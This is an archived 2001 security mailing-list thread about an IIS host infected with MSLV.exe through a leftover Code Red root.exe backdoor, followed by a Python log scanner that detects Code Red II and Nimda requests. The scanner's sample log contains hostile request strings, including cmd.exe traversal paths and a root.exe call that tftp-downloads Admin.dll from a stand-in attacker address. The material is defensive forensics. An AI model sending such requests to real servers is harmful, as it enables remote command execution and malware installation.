RE: MSLV.exe

From: Rob Keown (Keownat_private)
Date: Wed Nov 21 2001 - 18:54:14 PST


    Here are the facts:
    
    1. I believe the host was compromised by CodeRed in September. Admin cleaned
    the system, but did not remove root.exe from IIS's INETPUB/scripts...this is
    how the exploit was accomplished.
    
    2. IDS software was installed on the host in late September.
    
    3. On 11/17 the system failed, was rebuilt (perhaps without IIS
    patches...not sure), but the IDS failed to start. This might be why the
    system was vulnerable but unexploited until this time.
    
    4. Today a file called MSLV.exe was installed from a blackhat and appears to
    have code similar to SubSeven and Nimda. This is a very preliminary
    statement.
    
    5. Other reputable users on this forum requested the source and are
    disassembling it. One initial report that it is a valid exploit led to this
    post.
    
    6. We took a system snapshot of the system and are looking at logs. We
    removed the system from the network and cleansed it. Will monitor it
    closely.
    
    7. This isn't a small-, medium-, or large-scale problem at this time. Just
    sharing some info.
    
    Will let you know if this is something we should worry about. 
    
    Rob Keown
    
    
    
    
    -----Original Message-----
    From: Rob Keown [mailto:Keownat_private]
    Sent: Wednesday, November 21, 2001 5:58 PM
    To: incidentsat_private
    Subject: MSLV.exe
    
    
    I am in heads-down mode investigating an infection. The culprit is a file in
    the root of C: of an NT4 SP6 machine with supposedly patched IIS.
    
    MSLV.exe is in the root and contains Nimda-like exploit strings.
    
    Don't have time to go into detail. Can't find reference to mslv.exe
    anywhere.
    
    Anyone know of this?
    
    Rob Keown
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    
    
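The post's points 1 and 6 (a root.exe left behind in INETPUB/scripts after a CodeRed cleanup, and going back over the logs after the fact) describe exactly the check an incident handler wants to script: pull the IIS W3C log, find every request for root.exe or for cmd.exe via the Code Red II virtual roots and the Nimda Unicode/double-encoded traversal strings, and separate "probed" from "executed successfully". The following is an added example written for this archive page, not code from the original post or from the list. The log lines are constructed for the example (192.0.2.0/24 is a documentation range); the matching rules use only the well-known Code Red II backdoor paths and Nimda probe strings, and the field layout is the standard W3C extended format with a `#Fields:` header.

```python
"""Scan IIS W3C extended log lines for Code Red II backdoor use and Nimda probes.

Added example, not code from the original post.  SAMPLE_LOG is constructed
for the example.  Rules cover root.exe (the cmd.exe copy Code Red II drops in
/scripts and /MSADC), cmd.exe reached through the /c and /d virtual roots
Code Red II creates, and cmd.exe reached by Unicode / double-encoded traversal
(the Nimda probe set against /scripts, /msadc, /_vti_bin, /_mem_bin).
"""
from urllib.parse import unquote_to_bytes

# Constructed sample log (fields named in the #Fields header; W3C logs encode
# spaces inside a field as '+', so whitespace splitting is safe).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-11-21 17:41:02 192.0.2.10 GET /default.htm - 200
2001-11-21 17:42:15 192.0.2.55 GET /scripts/root.exe /c+dir 200
2001-11-21 17:42:16 192.0.2.55 GET /MSADC/root.exe /c+dir 404
2001-11-21 17:42:17 192.0.2.55 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-11-21 17:42:18 192.0.2.55 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 404
2001-11-21 17:42:19 192.0.2.55 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 404
2001-11-21 17:43:00 192.0.2.10 GET /images/logo.gif - 200
2001-11-21 17:45:30 192.0.2.55 GET /scripts/root.exe /c+tftp%20-i%20192.0.2.55%20GET%20Admin.dll 200
"""


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the last #Fields header."""
    fields = None
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data before #Fields header at line %d" % lineno)
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated/malformed line: skip rather than misalign fields
        rec = dict(zip(fields, values))
        rec["_line"] = lineno
        yield rec


def normalize_path(stem):
    """Decode %-escapes twice (catches %255c -> %5c -> '\\') and fold the
    overlong two-byte UTF-8 forms (%c0%af, %c1%1c, %c1%9c) that IIS 4/5
    accepted as '/' and '\\'.  Returns a lower-cased, forward-slash path."""
    raw = unquote_to_bytes(unquote_to_bytes(stem))
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            # Lead byte C0/C1 encodes a code point below 0x80, which UTF-8
            # forbids; compute it the way the vulnerable decoder did.
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1").replace("\\", "/").lower()


def classify(rec):
    """Return a rule name for a suspicious request, or None."""
    path = normalize_path(rec.get("cs-uri-stem", ""))
    if "root.exe" in path:
        return "codered2-backdoor"
    if "cmd.exe" in path:
        if "/../" in path:
            return "nimda-traversal"
        if path.startswith(("/c/", "/d/")):
            return "cmd-via-virtual-root"
    return None


def scan(text):
    """Return a list of findings (dicts) for every suspicious request in text."""
    findings = []
    for rec in parse_w3c(text):
        rule = classify(rec)
        if rule:
            findings.append({"line": rec["_line"], "ip": rec.get("c-ip"),
                             "rule": rule, "stem": rec["cs-uri-stem"],
                             "query": rec.get("cs-uri-query", "-"),
                             "status": rec.get("sc-status", "")})
    return findings


def confirmed_backdoor_clients(findings):
    """Client IPs that got a 2xx from root.exe: the box executed their command,
    so it is compromised, not merely probed."""
    return sorted({f["ip"] for f in findings
                   if f["rule"] == "codered2-backdoor" and f["status"].startswith("2")})


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print("line %(line)d %(ip)s %(rule)s %(stem)s %(query)s -> %(status)s" % f)
    print("clients that ran root.exe successfully:", confirmed_backdoor_clients(hits))
```

Run it against a real log by replacing `SAMPLE_LOG` with the file contents; a 404 on root.exe means the backdoor is gone (or never was there), while a 200 with a command in `cs-uri-query` is the line to chase in the rest of the investigation.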



    This archive was generated by hypermail 2b30 : Wed Nov 21 2001 - 19:03:53 PST